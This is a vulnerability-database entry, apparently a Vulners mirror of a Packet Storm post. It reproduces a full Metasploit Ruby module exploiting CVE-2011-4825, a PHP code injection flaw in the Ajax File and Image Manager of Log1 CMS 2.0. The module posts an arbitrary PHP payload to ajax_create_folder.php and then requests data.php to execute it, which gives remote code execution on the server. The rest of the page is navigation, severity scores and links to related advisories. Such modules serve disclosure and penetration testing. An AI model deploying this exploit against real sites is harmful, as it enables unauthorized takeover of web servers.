Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormEgiXPACKETSTORM:113226
HistoryJun 03, 2012 - 12:00 a.m.

Log1 CMS writeInfo() PHP Code Injection

2012-06-0300:00:00
EgiX
packetstormsecurity.com
41

0.969 High

EPSS

Percentile

99.7%

JSON
`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Log1 CMS writeInfo() PHP Code Injection",  
'Description' => %q{  
This module exploits the "Ajax File and Image Manager" component that can be  
found in log1 CMS. In function.base.php of this component, the 'data' parameter  
in writeInfo() allows any malicious user to have direct control of writing data  
to file data.php, which results in arbitrary remote code execution.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'EgiX', #Found the bug in ajax_create_folder.php  
'Adel SBM', #Found log1 CMS using the vulnerable ajax_create_folder.php  
'sinn3r' #Metasploit  
],  
'References' =>  
[  
['CVE', '2011-4825'],  
['OSVDB', '76928'],  
['EDB', '18075'], #Egix's advisory  
['EDB', '18151'] #Adel's  
],  
'Payload' =>  
{  
'BadChars' => "\x00"  
},  
'DefaultOptions' =>  
{  
'ExitFunction' => "none"  
},  
'Platform' => 'php',  
'Arch' => ARCH_PHP,  
'Targets' =>  
[  
['log1 CMS 2.0', {}],  
],  
'Privileged' => false,  
'DisclosureDate' => "Apr 11 2011",  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The base path to log1 CMS', '/log1cms2.0/'])  
], self.class)  
end  
  
  
def check  
uri = target_uri.path  
uri << '/' if uri[-1, 1] != '/'  
  
res = send_request_raw({  
'method' => 'GET',  
'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php"  
})  
  
if res and res.code == 200  
return Exploit::CheckCode::Detected  
else  
return Exploit::CheckCode::Safe  
end  
end  
  
  
def exploit  
uri = target_uri.path  
uri << '/' if uri[-1, 1] != '/'  
  
peer = "#{rhost}:#{rport}"  
php = %Q|#{rand_text_alpha(10)}=<?php #{payload.encoded} ?>|  
  
print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)")  
send_request_cgi({  
'method' => 'POST',  
'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php",  
'data' => php  
})  
  
print_status("#{peer} - Requesting data.php")  
send_request_raw({  
'method' => 'GET',  
'uri' => "#{uri}admin/libraries/ajaxfilemanager/inc/data.php"  
})  
  
handler  
end  
end`

Related

prion 1
openvas 2
dsquare 2
ubuntucve 1
cve 1
checkpoint_advisories 1
cvelist 1
nvd 1
prion
prion
Code injection
2011-12-15 03:57:00
openvas
openvas
Ajax File and Image Manager <= 1.0 Code Injection Vulnerability - Active Check
2011-11-07 00:00:00
Log1 CMS <= 2.0 PHP Code Injection Vulnerability - Active Check
2012-06-18 00:00:00
dsquare
dsquare
phpMyFAQ 2.7.0 RCE
2012-04-27 00:00:00
Log1 CMS 2.0 RCE
2012-06-26 00:00:00
ubuntucve
ubuntucve
CVE-2011-4825
2011-12-15 00:00:00
cve
cve
CVE-2011-4825
2022-10-03 16:15:13
checkpoint_advisories
checkpoint_advisories
Log1 CMS writeInfo() PHP Code Injection (CVE-2011-4825)
2013-10-28 00:00:00
cvelist
cvelist
CVE-2011-4825
2022-10-03 16:15:13
nvd
nvd
CVE-2011-4825
2011-12-15 03:57:34

0.969 High

EPSS

Percentile

99.7%

JSON
Related for PACKETSTORM:113226
prion1openvas2dsquare2ubuntucve1cve1checkpoint_advisories1cvelist1nvd1